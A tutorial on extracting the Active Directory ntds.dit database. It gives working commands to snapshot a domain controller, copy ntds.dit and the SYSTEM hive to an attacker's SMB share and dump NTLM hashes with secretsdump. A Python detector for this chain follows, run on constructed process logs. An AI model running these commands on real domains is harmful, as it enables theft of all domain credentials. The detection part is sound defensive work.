NTDS.DIT Active Directory

The ntds.dit file is the Active Directory (AD) database. It stores information about domain objects, including user accounts, password hashes (NTLM format), groups and group membership. Extracting the NTDS.DIT file and cracking or reusing the hashes it contains yields domain credentials that can be used for lateral movement and privilege escalation, which is why access to this file (and to the SYSTEM hive needed to decrypt it) is a high-value event to monitor on every domain controller.


NTDS.DIT file location

%SystemRoot%\NTDS\ntds.dit

OR

C:\Windows\NTDS\ntds.dit

Step 1: Create a Volume Shadow Copy

  1. List existing shadow copies

vssadmin List Shadows

  2. Delete the oldest shadow copy (if needed)

vssadmin Delete Shadows /For=C: /Oldest

  3. Create a new shadow copy

vssadmin create shadow /for=C:

Step 2: Copy the NTDS.DIT and SYSTEM Files

Both files should be taken from the same snapshot. The number in HardDiskVolumeShadowCopyN must match the "Shadow Copy Volume Name" that vssadmin create shadow printed in Step 1.

mkdir c:\ntds
copy \\?\GLOBALROOT\Device\HardDiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds\ntds.dit
copy \\?\GLOBALROOT\Device\HardDiskVolumeShadowCopy2\windows\system32\config\system c:\ntds\system

Alternatively, save the SYSTEM registry hive directly. The hive holds the boot key that secretsdump needs to decrypt the hashes stored in NTDS.DIT.

reg save hklm\system c:\ntds\system

Step 3: Transfer Files to Kali Linux

  1. Start the SMB server on Kali

impacket-smbserver -smb2support -user user -password 12345 share /opt/share

  2. Copy the files to the SMB share (the share name must match the one created above)

copy c:\ntds\ntds.dit \\192.168.29.218\share\
copy c:\ntds\system \\192.168.29.218\share\

Step 4: Extract Password Hashes from NTDS.DIT

impacket-secretsdump -system system -ntds ntds.dit local
impacket-secretsdump -system system -ntds ntds.dit -outputfile ntlm-extract local

The second form writes the dumped hashes to files prefixed ntlm-extract. The -hashes option is only used for authenticating to a remote target and is not needed with local.
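Every step of the procedure above leaves a host artifact: a vssadmin process creating a snapshot, a file copy that reads ntds.dit through the HarddiskVolumeShadowCopy device path, a reg save of HKLM\SYSTEM, and an outbound SMB transfer. The following detection script is an added example and is not part of the original page or of Impacket. It parses constructed process-creation log lines in a simplified key=value format modelled on Sysmon Event ID 1 fields (Time, Host, User, Image, CommandLine; all names and values are assumptions), classifies each event into a stage of the chain, and correlates stages per host inside a time window so that a domain controller showing the whole chain is rated higher than a file server whose backup agent merely creates a shadow copy.

```python
"""Detect the shadow-copy NTDS.dit extraction chain in process-creation logs.

Added example, not part of the original page. The log format (key=value pairs
modelled on Sysmon Event ID 1 fields) and all sample lines are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events. DC01 shows the full chain from the page;
# FS01 shows a lone shadow-copy creation (e.g. backup software);
# WS07 is benign noise.
SAMPLE_LOGS = [
    'Time=2024-05-01T10:00:01 Host=DC01 User=CORP\\backupsvc Image=C:\\Windows\\System32\\vssadmin.exe CommandLine="vssadmin list shadows"',
    'Time=2024-05-01T10:00:05 Host=DC01 User=CORP\\backupsvc Image=C:\\Windows\\System32\\vssadmin.exe CommandLine="vssadmin create shadow /for=C:"',
    'Time=2024-05-01T10:00:20 Host=DC01 User=CORP\\backupsvc Image=C:\\Windows\\System32\\cmd.exe CommandLine="copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\windows\\ntds\\ntds.dit c:\\ntds\\ntds.dit"',
    'Time=2024-05-01T10:00:25 Host=DC01 User=CORP\\backupsvc Image=C:\\Windows\\System32\\reg.exe CommandLine="reg save hklm\\system c:\\ntds\\system"',
    'Time=2024-05-01T11:00:00 Host=FS01 User=CORP\\admin Image=C:\\Windows\\System32\\vssadmin.exe CommandLine="vssadmin create shadow /for=D:"',
    'Time=2024-05-01T11:30:00 Host=WS07 User=CORP\\alice Image=C:\\Windows\\System32\\notepad.exe CommandLine="notepad.exe notes.txt"',
]

# key=value, where the value is either a double-quoted string (may contain
# spaces, as CommandLine does) or a run of non-whitespace characters.
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line):
    """Parse one key=value log line into a dict and add a parsed timestamp."""
    ev = {}
    for key, quoted, bare in FIELD_RE.findall(line):
        ev[key] = quoted if quoted else bare
    ev["time"] = datetime.fromisoformat(ev["Time"])
    return ev


def classify(ev):
    """Map one event to the extraction stages it matches (empty set if none)."""
    image = ev.get("Image", "").lower()
    cmd = ev.get("CommandLine", "").lower()
    stages = set()
    if image.endswith("vssadmin.exe") and re.search(r"\bcreate\s+shadow\b", cmd):
        stages.add("shadow_create")
    # Reading ntds.dit through the shadow-copy device path is the key signal:
    # the live database is locked by the DC, so this path is how the lock is bypassed.
    if "harddiskvolumeshadowcopy" in cmd and "ntds.dit" in cmd:
        stages.add("ntds_from_shadow")
    if image.endswith("reg.exe") and re.search(r"\bsave\s+hklm\\system\b", cmd):
        stages.add("system_hive_save")
    return stages


def _severity(stages):
    """Rate a group of correlated stages seen on one host."""
    if "ntds_from_shadow" in stages:
        return "high"
    if {"shadow_create", "system_hive_save"} <= stages:
        return "medium"
    # A lone shadow-copy creation or hive save is common for legitimate
    # backup tooling; tune with an allow-list of backup accounts and images.
    return "low"


def _alert(host, group):
    stages = set().union(*(s for _, s in group))
    return {
        "host": host,
        "users": sorted({ev["User"] for ev, _ in group}),
        "stages": stages,
        "severity": _severity(stages),
        "first": group[0][0]["Time"],
        "last": group[-1][0]["Time"],
    }


def detect(lines, window=timedelta(minutes=10)):
    """Correlate stage hits per host inside a time window and return alerts."""
    by_host = defaultdict(list)
    for line in lines:
        ev = parse_event(line)
        stages = classify(ev)
        if stages:
            by_host[ev["Host"]].append((ev, stages))
    alerts = []
    for host, hits in by_host.items():
        hits.sort(key=lambda h: h[0]["time"])
        group = []
        for hit in hits:
            # Close the current group when the next hit falls outside the window.
            if group and hit[0]["time"] - group[0][0]["time"] > window:
                alerts.append(_alert(host, group))
                group = []
            group.append(hit)
        if group:
            alerts.append(_alert(host, group))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOGS):
        print(f"[{a['severity'].upper()}] {a['host']} {a['first']}..{a['last']} "
              f"users={a['users']} stages={sorted(a['stages'])}")
```

Run as a script it prints one line per alert; on the constructed sample DC01 is rated high (all three stages within 25 seconds) and FS01 low (shadow copy only). In production the same classify() rules map directly onto process-creation telemetry from Sysmon or the Security log (event 4688 with command-line auditing enabled), and the per-host window is the part worth tuning: a domain controller running "reg save hklm\system" or reading ntds.dit from a snapshot path is rarely legitimate, whereas vssadmin create shadow alone is routine on hosts with backup agents.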
